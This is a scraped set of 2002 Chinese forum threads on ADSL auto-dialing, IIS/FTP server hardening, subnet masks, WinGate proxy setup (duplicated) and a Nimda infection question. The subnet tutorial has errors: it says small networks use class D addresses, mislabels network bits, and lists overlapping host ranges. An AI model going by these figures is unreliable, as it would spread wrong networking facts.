 发表于 2002-02-13 10:19:09 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
怎么没有趣！

这说明你的机器自动转变成了MAC（苹果）机了，呵呵…………

好几万一台呢！高兴吧你！……………………哈哈……………………

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

上一贴 | 下一贴
快速回复 主题：IP地址与MAC地址简介
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


有什么软件可以当机器一启动就自动拨号上网 - 经 典 论 坛

计算机技术
有什么软件可以当机器一启动就自动拨号上网

上一贴 | 下一贴
发表人 主题: 有什么软件可以当机器一启动就自动拨号上网
菜菜子

肥皂泡泡
积分：3398
发帖：1646
来自：上海
注册：2000-08-10
 发表于 2002-02-22 09:27:46 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 收藏该主题供以后查看 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
我现在用的是ADSL，每次开机需要手动拨号，用什么软件可以让其开机自动就拨号连接？

梧桐身旁的浮云里飘出一弯熟悉的月光，轻轻淡淡的月光静静地散落在我的身上

--熙宁街43号--

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-22 12:13:32 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
你把拨号程序放到启动组里不就行了嘛！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

菜菜子

肥皂泡泡
积分：3398
发帖：1646
来自：上海
注册：2000-08-10
 发表于 2002-02-22 16:54:21 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
不行，这样只是开机自动弹出拨号对话框，还是得按一下拨号按钮才能拨。

我的意思是我的机器是服务器，是锁定了的，局域网中的电脑如果要上网，就得开我的机器，但又能在不解锁的状态下拨号，懂了？

梧桐身旁的浮云里飘出一弯熟悉的月光，轻轻淡淡的月光静静地散落在我的身上

--熙宁街43号--

kirsten9

终级用户
积分：532
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-02-22 16:59:41 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
菜菜子在上个帖子中说
引用:
我现在用的是ADSL，每次开机需要手动拨号，用什么软件可以让其开机自动就拨号连接？

ADSL有2种接入方式，你现在这种是虚拟拨号方式，换成专线接入就可以实现开机就上网。

{ KUka ALl wAYs wITh yOU }
菜菜子

肥皂泡泡
积分：3398
发帖：1646
来自：上海
注册：2000-08-10
 发表于 2002-02-22 17:09:04 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
怎么换？要收费？

梧桐身旁的浮云里飘出一弯熟悉的月光，轻轻淡淡的月光静静地散落在我的身上

--熙宁街43号--

添君E画

危险人物
积分：1347
发帖：582
来自：四川省达洲市
注册：2002-01-11
 发表于 2002-02-22 17:11:58 按此观看添君E画的个人资料 按此发邮件给添君E画 访问添君E画的主页 添君E画 的 oicq 是8341595,查看 8341595 的资料 发送悄悄话给添君E画 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看添君E画的IP
但是现在有多少是用的ADSL呢?

[注：这是个危险人物！] .: :.
kirsten9

终级用户
积分：532
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-02-22 17:26:29 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
菜菜子在上个帖子中说
引用:
怎么换？要收费？

sure

{ KUka ALl wAYs wITh yOU }
kirsten9

终级用户
积分：532
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-02-22 17:28:00 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
添君E画在上个帖子中说
引用:
但是现在有多少是用的ADSL呢?

我这个偏僻小城市。。。能有猫用已经很满足了

{ KUka ALl wAYs wITh yOU }
northice

终级用户
积分：545
发帖：477
来自：来的地方
注册：2001-02-22
 发表于 2002-02-22 19:48:59 按此观看northice的个人资料 按此发邮件给northice northice 的 oicq 是3418177,查看 3418177 的资料 发送悄悄话给northice 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看northice的IP
专线＋路由

YOU MUST GO,OR YOU WILL BE SAD!
piety

终级用户
积分：737
发帖：210
来自：www.piccool.
注册：2001-09-03
 发表于 2002-02-22 20:05:02 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP
普通的拨号WIN2000不是可以在开机的地方选择？ADSL的没试过，单位的宽带不是ADSL

人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
CrazyParty

群山之巅
积分：2491
发帖：922
来自：温州
注册：2000-10-14
 发表于 2002-02-22 21:39:29 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
专线方式需要ADSL猫中设有IP地址10.Xxxx之类的

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-23 01:06:44 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
northice在上个帖子中说
引用:
专线＋路由

路由？贵啊~~

::古落根门::

唯有不断学习 才能不断进步

QUESTER

鼠标说话
是个版主
积分：2790
发帖：1293
来自：GTA
注册：2000-08-28
 发表于 2002-02-23 04:40:37 按此观看QUESTER的个人资料 按此发邮件给QUESTER 发送悄悄话给QUESTER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QUESTER的IP
对于ADSL，可自己安装pppoe协议，然后可以使用拨号辅助工具实现开机自动拨号上网

下载 ColorKey 试用版 解决配色问题
逢对手鼠标说话，仗一键快意恩仇！
...大象无形 大音稀声...
Blueidea Web Team
Moderator of Art & Design
上一贴 | 下一贴
快速回复 主题：有什么软件可以当机器一启动就自动拨号上网
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


如何设置服务器？谢谢帮忙 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
如何设置服务器？谢谢帮忙

上一贴 | 下一贴
发表人 主题: 如何设置服务器？谢谢帮忙
bibi

高级用户
积分：217
发帖：69
来自：
注册：2001-05-14
 发表于 2002-03-04 11:04:57 按此观看bibi的个人资料 按此发邮件给bibi bibi 的 oicq 是37411963,查看 37411963 的资料 收藏该主题供以后查看 发送悄悄话给bibi 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bibi的IP
nt服务器，如何用iis把网页放到网上让人访问？
谢谢
quakerman

高级用户
积分：221
发帖：199
来自：
注册：2001-07-23
 发表于 2002-03-04 11:18:43 按此观看quakerman的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给quakerman 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看quakerman的IP
文章版权所有：玉环信息港--潇寒
OICQ：277785
论坛地址：http://www.yuhuan.cc/bbs
转载的时候请保留版权

WEB服务器的设置
一.这次讲的是IIS的一些设置，由于小弟中用过win2k的服务器版，其它的我就不会了，同时我管理服务器
也只有两个月的时候，在此之前，从来没有接触过iis之类的，连在本机调试也没有。这次由于很多的朋友
问iis的设置问题，我就将这两个月来我所积累的经验写出来，希望大家不要见笑。有不足的地方能够指出一
下。好了，费话不多了，下面我们就开始吧！
二.首先我们先来建立web站点吧，管理工具--Internet 服务管理器--新建一个web站点就可以了，或者就
用默认的web站点。好了，建好了一个站点，我们接下来就要为这个站点捆邦一个域名了，通常大家都是会自
己的国际顶级域名解析到自己的服务器上，你只要在域名服务商那里将域名解析到这台服务器的ip上就可以
了，我们打开己建好的web站点的属性，嘿嘿，那个主机头就填你的顶级域名就OK了，你有几个就填几个。很简
单的啊。接下来配置合适的脚本映射。在主目录的执行许可的配置里面。
首先我们来删除一些没有什么用的并可能导致服务器被攻击的脚本映射！
1 *.htr这是一个比较厉害的文件，删掉好了。否则，任何人都可以通过你的web来进行非法操作，甚至格式化

掉你的硬盘。
2 *.hta 删掉吧。
3 *.idc 所以删掉他。
4 *.printer这个是打印机文件。去掉他好了
5 *.htw , *.ida *.idq这些都是索引文件，可以去掉了。
可执行的文件你可以自由配置啦啊，如果不让支持asp就将asp的脚本映射删除就行了，想让支持cgi,php（己
安装了解释器），就配置这些文件的执行程序就可以了。。比如要执行php,你的php安装在c:\php，那你就在
主目录的配置里的应用程序配置，添加可执行文件c:\php\php.exe，扩展名为.php就可以了，那么这个站点就
可以运行php了，如果你想让他运行php3,重复上面的工作，只是将扩展名改成.php3就行了。呵。cgi也一样啊
添加cgi可执行文件，扩展名用.cgi就行了。
下面我们要做的就是将默认的站点（您可以选择停止，不让运行）的默认的一些虚拟目录删除，像iisadmin

这些，要不然可能就死得很惨哟！！呵呵很简单啊。。同样你建立一个虚拟目录也很简单啊，点击web站点的右

键，新建一个虚拟目录，比如要建一个虚幻神化的江湖，就新建一个jxqy的虚拟目录名，接着就指向你程序所

在的位置就可以使用www.*****.com/jxqy来访问你的虚幻神化了。
还有，如果你建的这个web站点是送朋友的或者卖给客户的，你想做他的网站作一些限制？？（别太心狠啊，

作太多的限制哟），打开web站点的属于，有一个链接，看到没？一个是无限，一个是限制的，我们选择下面的

限制，要限制多少人呢？得了，150人吧，那就填150链接，链接超时？一般150就够啦啊！！下面我们来对网站

的性能作一些限制吧。那就在web站点的属性这里的性能这里设置吧，呵呵。你希望这个网站每天的点击量多少

啊？？想多少？？自己选择了，下面选择启动宽带限制啊。。一般20kb/s就可以了。。。最大cpu占用资源？？

2%就可以了。呵呵，我还要为服务器上的服务站着想呢：）
在web站点的属性看到那个文档没？那个就是设置站点的默认首页的，你的站想使用什么文件作首页就在这

里调吧。呵呵。还有web站点属性里面的那个目录安全性，用到的地方可大着呢，呵呵。首先，在这里设置大家

匿名访问你的网站。。。管理工具--Internet 服务管理器--打开你所需设置的web站点的属性--目录安全性--

匿名访问和验证控制--编辑--匿名访问打上勾--编辑--选择你的用来作匿名访问的帐号--确定--好了可以访了

！！呵呵，想不让某些爱搞蛋的家伙不能来访问你的网站？？？那就将他们的IP限制住就行喽，也就在目录安

全性这里。不要说你这也不会啊。。
三：我们来讲讲ftp的设置吧。。这个就很简单啦啊，在Internet信息服务里点右键，新建ftp站点，按下

一步，填写这个ftp站点的说明。填写ip地址，就写你的服务器的IP吧，端口？？随便你想一个啊，最好人家不

好猜到的，这样的话就算是知道用户名和密码，一时也不好上FTP哟，呵呵。再下一步就是这个FTP链上的时候

，指向你服务器上的哪一个目录啊，这个你自己设吧，你建立的哪个目录是用来放网站的就指向哪个目录，好

了，一个FTP建成了。。接下来你就因该去管理工具里面的计算机管理，新建一个用户了，是用作链接刚才新建

的这个FTP的帐号。帐号建好了，那就去要开刚才新建的FTP的属性，同样有链接的选项，呵呵，同时使用这个

FTP的人？三四个就可以了。下面我们看看安全帐号这里，将匿名进行FTP的这个勾去掉，要不然别人就匿名上

这个FTP了，呵呵，我最喜欢这样上人家的服务器拷贝资料了，呵呵。再添加一个操作员，也就是你刚才新建的

帐号啊。还有旁边还有一个消息的功能，就用来链接FTP，服务器的提示信息，就是在这里填的，还有目录安全

性？你不想让某个IP段或某个IP不准使用这个FTP？来这里限制吧。呵。好了，一些设置基本上也只有这么一些

，下面我们来讲讲给用户配置空间的大小吧。。
四：磁盘分区配额
磁盘配额的启用
大家都知道，我们有时需要限制某些客户的能够使用的磁盘容量，这点，我们也可以做到，并不需要其它

的什么软件，WIN2K本身有这个功能。但必须要求你格式化硬盘的时候，是采用ntfs 5.0进行分区的。在NTFS

5.0的分区中，打开“属性”对话框之后，如果当前的用户是系统管理员或是系统管理员组的一个成员，那就会

看到“属性”对话框中有“配额”这一项，如果你不是采用NTFS 5.0分区的，那你就没有这项功能。
在默认的情况下，碰盘配额是被禁用的，如果要启用碰盘配额，只需选择“启用配额管理”复选框，单击

“确定”或“应用”按扭就可以启用磁盘配额了。碰盘配额是由windowns 2000 中的碰盘配额程序管理和控制

的，当启用磁盘配额时，磁盘配额程序就被启动。
磁盘配额的分配和设置
碰盘配额是基于用户和文件所有者的一种磁盘分配机制。利用磁盘配额机制，系统管理员可以设置每个用

户使用NTFS5.0分区磁盘空间的上限.打开配额项,有两个选项:
1:不限制磁盘使用:对新用户不限制碰盘使用,任何新用户可以充分使用磁盘空间,直至达到最大的磁盘容

量。
2将磁盘空间限制为：选择了这个选项之后，可以设置“配额限制（puota limit)”的大小和：配额警告

等级(quota warning level)”的大小。“配额限制”指定在当前分区中新用户最大可以使用的磁盘空间，比如

我将警告等级设为200MB，警告等级为198MB，如果己使用了达到198M的东西，那系统上就会警告了，如果达到

200M了，那该用户就无法再上传东西了。
在“配额”对话框中还有以下设置
1：拒绝将磁盘空间给超过配额限制的用户：选择了这个选项之后，当用户使用的磁盘空间达到了配额限

制之后，用户就不能再往该分区新加什么数据了。如果不选择此选项，则用户使用的磁盘空间超出配额限制，

系统可能只是记录下这个事件。
2：用户超出磁盘配额时记录事件：选择了该选项之后，当用户使用的磁盘空间超出磁盘配额时，系统会

在系统日志中记录这件事。
3：用户超出警告等级时记录事件：选择了该选项之后，当用户使用的磁盘空间超出警告等级时，系统会

在系统日志中记录这件事。
还有服务器的安全，只要有补丁就打，多看看LOG我想没什么问题了。别忘了，微软是补丁大王。

好了，就写这么多了，累死我了。这些我都是在WIN2K服务器上，使用的是WIN2K自带的FTP，以前听很多人

说IIS自带的没有限制空间大小等这些功能。。现在明白了没有？？有什么问题到我的论坛提出吧！

潇寒于2001.8.27

感情就像一粒种，不管你对他掉眼泪还是撒尿，他都可能发芽……
上一贴 | 下一贴
快速回复 主题：如何设置服务器？谢谢帮忙
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


轻松设置子网掩码 - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
轻松设置子网掩码

上一贴 | 下一贴
发表人 主题: 轻松设置子网掩码
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-03-11 16:30:49 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 收藏该主题供以后查看 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
现在电脑的应用越来越广泛，不但各公司企业大量的应用电脑，许多家庭也拥有不止一台电脑。于是不少朋友就希望组建自己的网络，以实现资源共享提高投资的利用率。其实组建自己的家庭网并不难，照着系统的提示一步步往下做就行了，但是一遇到设置子网掩码这一步许多朋友就难免一头雾水，常常是稀里糊涂的填一个255.255.255.0了事。但是如果你想分两个独立的网络时该怎么办呢？如果你想让每个网络的工作站数不超过30时该怎么办呢？No Problem！跟我来！今天我就说说有关于设置子网掩码的问题。
    我们知道IP地址分成四部分中间用句点隔开，例如123.45.6.9。家庭或小型公司组建小型网一般用D类地址就可以了，所以我们只看IP地址的最后一节，其他的可依此类推。为了形象起见我们用符号表示最后一节的每个二进制位，即（H代表主机N代表服务器）
H H H H H H H H
7 6 5 4 3 2 1 0
    划分子网的时候其实就是损失了主机地址把前几位的主机地址分给了网络。例如：如果你想把前四位划分给网络后面四位就会分给主机，这时你将会有16个工作组，每个工作组有16-2=14个主机地址可分（2的4次方，全零和全一一般不能使用），子网掩码是255.255.255.240其中240是由下式求得：
N 　　N 　　N 　N 　　　　H 　　H　　H　　H
128 + 64 + 32 + 16 = 240
  即将每个网络位下面的标号作为指数，以2为底求得的值相加求和。这时1~16，17~32，32~48，49~64，65~80，81~96，97~112……分别为一个工作组,工作组内部的计算机可实现直接互相访问，不同工作组的工作站只能通过网关实现相互访问。如果你想让每个工作组有30个工作站，则只需取前三位作为网络位，这时你将有8个工作组，每个工作组有32-2=30个工作站，子网掩码是255.255.255.224其中224是由下式求得：
N 　　N　　N 　　　H　　　H　　　H　　　H　　　H
128 + 64 + 32 =224
这时1~32，33~64，65~96，97~128，129~160，161~192，193~224，225~256分别为一个工作组可实现内部直接互访。如果你想让你的网络的每个工作站都能直接相互访问，就不需分割子网这时的子网掩码只需取
255.255.255.0即可。
H 　H　H　H　H　H　H　H

::古落根门::

唯有不断学习 才能不断进步

Fly

Developer
积分：4146
发帖：1028
来自：
注册：2001-10-31
 发表于 2002-03-11 16:58:29 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
不知WIN2K_SERVER里，你填好IP后，它自动生成的子网掩码是不是正确的

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-03-12 19:42:47 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
那只是一个大的网段比如255。255。0。0这个是可以的，我的意思只是如果你想更细得划分网络，就要设置子网掩码。
如果你填的是A类，就是255.0.0.0
如果你填的是b类，就是255.255.0.0
如果你填的是c类，就是255.255.255.0

::古落根门::

唯有不断学习 才能不断进步

mao

现任版主
积分：1694
发帖：691
来自：北京
注册：2000-07-23
 发表于 2002-03-12 23:59:05 按此观看mao的个人资料 按此发邮件给mao 访问mao的主页 mao 的 oicq 是20801171,查看 20801171 的资料 发送悄悄话给mao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mao的IP
如果需要划分子网子网掩码才发挥它的真正可以令大家理解的作用

解决问题才有进步
解决问题才有进步
上一贴 | 下一贴
快速回复 主题：轻松设置子网掩码
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


WINGATE简易设置 - 经 典 论 坛

计算机技术
WINGATE简易设置

上一贴 | 下一贴
发表人 主题: WINGATE简易设置
F鹰

超级用户
积分：313
发帖：94
来自：
注册：2002-02-27
 发表于 2002-03-14 11:21:55 按此观看F鹰的个人资料 按此发邮件给F鹰 F鹰 的 oicq 是105454121,查看 105454121 的资料 收藏该主题供以后查看 发送悄悄话给F鹰 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看F鹰的IP
1、TCP/IP的设置

    请先确定是否已安装网卡驱动程序(例 NE2000 compatible)并在该驱动程序上安 装TCP/IP协议。如还没有安装TCP/IP，则按以下步骤安装：

    在控制面板－网络，找到 TCP/IP (网卡的那一个)，按 [内容]会出现下列设定， 其设法如下∶

（1）[IP 地址]IP 地址: 输入192.168.0.1子网掩码∶255.255.255.0

（2）[WINS 地址]关闭 WINS；

（3）[DNS]选禁用

如果主机系统为Windows95，需要升级WinSock2，可以到微软站点下载。

URL : http://www.microsoft.com/-------

2、 Wingate的安装

    安装时会出现如下画面，安装在代理服务器上时，需选第二项，”Configure this machine

as a WinGate Server”

    接下来输入注册码信息，按安装向导指导即可完成安装。

3、 Wingate代理服务器端的设置。

  （1） 双击Gatekeeper，提示需输入口令，因初始口令为空，直接回车；WinGate提示输入新口令，输入新口令，确认后回车即可。

  （2）拨号网络的设置

    Gatekeeper的主管理界面如上图所示，左键双击”Dialer”，弹出窗口如下图所示，选中一个拨号器，输入在ISP申请的上网帐号的用户名和密码，Domain为空。

（3）SMTP服务的添加

    在Gatekeeper中的Service管理初始状态下如果没有“SMTP”服务，需要自行添加，步骤如下（如果已经有了’SMTP Mapping Service’可以在此修改配置）：

    a、在”Services”管理界面中点鼠标右键，添加”TCP Mapping Service”，

    b、在”Connection to Service”中的”Accept Connections on”窗口中填入25。（当与 Mdaemon结合时，此处应改为2500）；

    c、激活Default Mapping， Server窗口应输入ISP端的发件服务器的IP或域名，如：public a.net.cn ，端口为25。

    注意：当WinGate与MDaemon结合时，POP3 Service的端口也需要改为：1100

    每次在Gatekeeper更改都要保存设置。

WINGATE工作站端的安装与设定

    工作站的安装有两种方式：

    1、手动配置：

    在工作站上不需安装拨号适配器，需要设定网卡的TCP/IP协议即可。

    设置步骤同代理服务器，分为以下几步：

    [IP 地址] IP 地址: 输入 192.168.0.2，注意，不可和代理服务器的地址相同，若有一台以上的工作站，其每台工作站的 IP 也不可重覆， 子网掩码: 255.255.255.0；

    [WINS 地址] 关闭 WINS；

    [DNS] 选启用DNS主机中填入本机名称，如: David (此电脑名称亦不可和代理服务 器相同，需唯一)，域名窗口不填，DNS 服务器搜索顺序中，填入你的代理服务器的 IP，如 192.168.0.1，填入后按[新增]。域后缀搜索顺序，让它空白，设完后选确定，然后关闭，重起工作站，设置即可生效。

    检测：工作站在以上设定完成后，基本配置已完成，需要进行进一步测试，方法如下：

    开启一个 DOS 窗，输入 ping 192.168.0.1 若是有回应，这表示和代理服务器的连接是正确的。若无回应，则重新检查一次你的网络设置。

    2、安装WinGate客户端软件

    安装步骤同代理服务器端软件安装步骤，只是在安装时选择“configure this machine as a wingate client“，在TCP/IP设置中的DNS服务器搜索顺序中，填入你的代理服务器的 IP，如 192.168.0.1。

Internet连入测试
    1、在代理服务器上启动拨号网络，直接连上 Internet！

    2、在工作站上的 Dos 窗，输入 ping public.bta.net.cn 若显示如下讯息:

    Pinging [202.96.0.97] with 32 bytes of data

    Destination host unreachable Destination host unreachable

Destination host unreachable Destination host unreachable

    表示你的工作站已经可通过代理服务器成功连接 DNS，因为public.bta.net.cn 是 Domain Name，而回应回来的讯息是 IP 地址，由此可得证。致於 Destination host unreachable 的讯息，是正常的，主要是看第一行是否有出现 目标主机IP 地址。
引用WWW1、TCP/IP的设置

    请先确定是否已安装网卡驱动程序(例 NE2000 compatible)并在该驱动程序上安 装TCP/IP协议。如还没有安装TCP/IP，则按以下步骤安装：

    在控制面板－网络，找到 TCP/IP (网卡的那一个)，按 [内容]会出现下列设定， 其设法如下∶

（1）[IP 地址]IP 地址: 输入192.168.0.1子网掩码∶255.255.255.0

（2）[WINS 地址]关闭 WINS；

（3）[DNS]选禁用

如果主机系统为Windows95，需要升级WinSock2，可以到微软站点下载。

URL : http://www.microsoft.com/-------

2、 Wingate的安装

    安装时会出现如下画面，安装在代理服务器上时，需选第二项，”Configure this machine

as a WinGate Server”

    接下来输入注册码信息，按安装向导指导即可完成安装。

3、 Wingate代理服务器端的设置。

  （1） 双击Gatekeeper，提示需输入口令，因初始口令为空，直接回车；WinGate提示输入新口令，输入新口令，确认后回车即可。

  （2）拨号网络的设置

    Gatekeeper的主管理界面如上图所示，左键双击”Dialer”，弹出窗口如下图所示，选中一个拨号器，输入在ISP申请的上网帐号的用户名和密码，Domain为空。

（3）SMTP服务的添加

    在Gatekeeper中的Service管理初始状态下如果没有“SMTP”服务，需要自行添加，步骤如下（如果已经有了’SMTP Mapping Service’可以在此修改配置）：

    a、在”Services”管理界面中点鼠标右键，添加”TCP Mapping Service”，

    b、在”Connection to Service”中的”Accept Connections on”窗口中填入25。（当与 Mdaemon结合时，此处应改为2500）；

    c、激活Default Mapping， Server窗口应输入ISP端的发件服务器的IP或域名，如：public a.net.cn ，端口为25。

    注意：当WinGate与MDaemon结合时，POP3 Service的端口也需要改为：1100

    每次在Gatekeeper更改都要保存设置。

WINGATE工作站端的安装与设定

    工作站的安装有两种方式：

    1、手动配置：

    在工作站上不需安装拨号适配器，需要设定网卡的TCP/IP协议即可。

    设置步骤同代理服务器，分为以下几步：

    [IP 地址] IP 地址: 输入 192.168.0.2，注意，不可和代理服务器的地址相同，若有一台以上的工作站，其每台工作站的 IP 也不可重覆， 子网掩码: 255.255.255.0；

    [WINS 地址] 关闭 WINS；

    [DNS] 选启用DNS主机中填入本机名称，如: David (此电脑名称亦不可和代理服务 器相同，需唯一)，域名窗口不填，DNS 服务器搜索顺序中，填入你的代理服务器的 IP，如 192.168.0.1，填入后按[新增]。域后缀搜索顺序，让它空白，设完后选确定，然后关闭，重起工作站，设置即可生效。

    检测：工作站在以上设定完成后，基本配置已完成，需要进行进一步测试，方法如下：

    开启一个 DOS 窗，输入 ping 192.168.0.1 若是有回应，这表示和代理服务器的连接是正确的。若无回应，则重新检查一次你的网络设置。

    2、安装WinGate客户端软件

    安装步骤同代理服务器端软件安装步骤，只是在安装时选择“configure this machine as a wingate client“，在TCP/IP设置中的DNS服务器搜索顺序中，填入你的代理服务器的 IP，如 192.168.0.1。

Internet连入测试
    1、在代理服务器上启动拨号网络，直接连上 Internet！

    2、在工作站上的 Dos 窗，输入 ping public.bta.net.cn 若显示如下讯息:

    Pinging [202.96.0.97] with 32 bytes of data

    Destination host unreachable Destination host unreachable

Destination host unreachable Destination host unreachable

    表示你的工作站已经可通过代理服务器成功连接 DNS，因为public.bta.net.cn 是 Domain Name，而回应回来的讯息是 IP 地址，由此可得证。致於 Destination host unreachable 的讯息，是正常的，主要是看第一行是否有出现 目标主机IP 地址。

摘自： WWW.YESKY.COM

=BULEIDEA=SOS
上一贴 | 下一贴
快速回复 主题：WINGATE简易设置
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


nimada怎么杀干净？？？ - 经 典 论 坛

计算机技术
nimada怎么杀干净？？？

上一贴 | 下一贴
发表人 主题: nimada怎么杀干净？？？
darkvn

小混蛋
现任版主
积分：8295
发帖：2581
来自：不是外星
注册：2001-03-02
 发表于 2002-01-18 19:34:25 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 收藏该主题供以后查看 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
操作系统win98+2000pro
win98现在启动后系统反应速度极慢！形同死机！win2000可以正常启动，速度也正常。

没有装任何防病毒软件。且2000没有猫的驱动不能上网。

